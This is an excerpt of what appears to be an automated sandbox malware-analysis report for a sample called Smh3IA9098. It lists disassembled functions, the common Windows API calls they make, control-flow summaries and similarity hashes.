                                                                                              control_flow_graph 2318 6773b60-6773b67 2319 6773b68-6773bfc DuplicateHandle 2318->2319 2320 6773c05-6773c22 2319->2320 2321 6773bfe-6773c04 2319->2321 2321->2320
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06773B2E,?,?,?,?,?), ref: 06773BEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 1c764ea9e385a13cfc054507fc70843ad34b31de658257531f2ef6f97fe723b4
                                                                                              • Instruction ID: 9cbf61cb631a2089ac111e83b30364b0fed62927a1e63d8eac843f4e7b3bfa76
                                                                                              • Opcode Fuzzy Hash: 1c764ea9e385a13cfc054507fc70843ad34b31de658257531f2ef6f97fe723b4
                                                                                              • Instruction Fuzzy Hash: 7A21E5B5900248EFDB10CF9AD984ADEBFF9EB48320F14841AE914A3310D378A944DFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0677BFB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2324 677bfb8-677d480 2326 677d482-677d485 2324->2326 2327 677d488-677d4b7 LoadLibraryExW 2324->2327 2326->2327 2328 677d4c0-677d4dd 2327->2328 2329 677d4b9-677d4bf 2327->2329 2329->2328
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0677D2B9,00000800,00000000,00000000), ref: 0677D4AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 8ad1523a8162278d4db5d22df3afdda4f14ba03554f74d7b099c2a4736319559
                                                                                              • Instruction ID: de2f371eb496e77df68ddb8c569559258c02fe0f11582da86d4d60c57809edf7
                                                                                              • Opcode Fuzzy Hash: 8ad1523a8162278d4db5d22df3afdda4f14ba03554f74d7b099c2a4736319559
                                                                                              • Instruction Fuzzy Hash: E711C4B69002099FDB60CF9AD444BDEBBF5AF88354F14842AE819B7300C379A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0677D439 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2332 677d439-677d480 2333 677d482-677d485 2332->2333 2334 677d488-677d4b7 LoadLibraryExW 2332->2334 2333->2334 2335 677d4c0-677d4dd 2334->2335 2336 677d4b9-677d4bf 2334->2336 2336->2335
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0677D2B9,00000800,00000000,00000000), ref: 0677D4AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 85c6930f7cebdc864cbb2765c6c58131db5afc9eacaab2c6f3ef9e57891eec6d
                                                                                              • Instruction ID: fa5e45c96635bb81b6e6b656eaf7f2120c229da097326e7f6f2f16644e81bd5f
                                                                                              • Opcode Fuzzy Hash: 85c6930f7cebdc864cbb2765c6c58131db5afc9eacaab2c6f3ef9e57891eec6d
                                                                                              • Instruction Fuzzy Hash: 4C11C2B6D002499FDB20CF9AD444BEEFBF5AF88314F14842AD819A7710C3B9A545CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0677BF74 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2339 677bf74-677d218 2342 677d220-677d24b GetModuleHandleW 2339->2342 2343 677d21a-677d21d 2339->2343 2344 677d254-677d268 2342->2344 2345 677d24d-677d253 2342->2345 2343->2342 2345->2344
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0677D00B), ref: 0677D23E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 96837b745a95c74c857dd9a61071cf5c2c5dbdd32742b233cbdca2a837a3cd55
                                                                                              • Instruction ID: eebe21e0af8a542673b7fbc1008660ad50a504f184b56825575069b9386e46a0
                                                                                              • Opcode Fuzzy Hash: 96837b745a95c74c857dd9a61071cf5c2c5dbdd32742b233cbdca2a837a3cd55
                                                                                              • Instruction Fuzzy Hash: 9A11F0B1D002498FDB20CF9AD544BDEFBF5AF88324F11846AD819B7600D3B8A546CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06727080 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 06727B25
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: f9c4c4af0e76c00fd10381a5c1cb958c051683f77e747e1d33de5cfabf33d019
                                                                                              • Instruction ID: 58b542cbeb52c5648f9bb02fecde7fcc946b9c60d6163717a71517dfdb006d18
                                                                                              • Opcode Fuzzy Hash: f9c4c4af0e76c00fd10381a5c1cb958c051683f77e747e1d33de5cfabf33d019
                                                                                              • Instruction Fuzzy Hash: 0F1115B1900249CFCB50DF9AD584BDEBBF4EB48324F108459E519B7700D378A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06727AC9 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OleInitialize.OLE32(00000000), ref: 06727B25
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize
                                                                                              • String ID:
                                                                                              • API String ID: 2538663250-0
                                                                                              • Opcode ID: 9dcde531a5e91be499c22426386b98e9a49d28014a5c3076e7d5d27a8ba54072
                                                                                              • Instruction ID: d4f309fd1ee3f9c3ea7e7ae5ea7ba7f86b3d8d2bc381b0fb031b65d392e47f3f
                                                                                              • Opcode Fuzzy Hash: 9dcde531a5e91be499c22426386b98e9a49d28014a5c3076e7d5d27a8ba54072
                                                                                              • Instruction Fuzzy Hash: 6D1103B1D00249CFCB60DF9AD584BDEBBF8AB48364F148459E418B3700D378A944CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%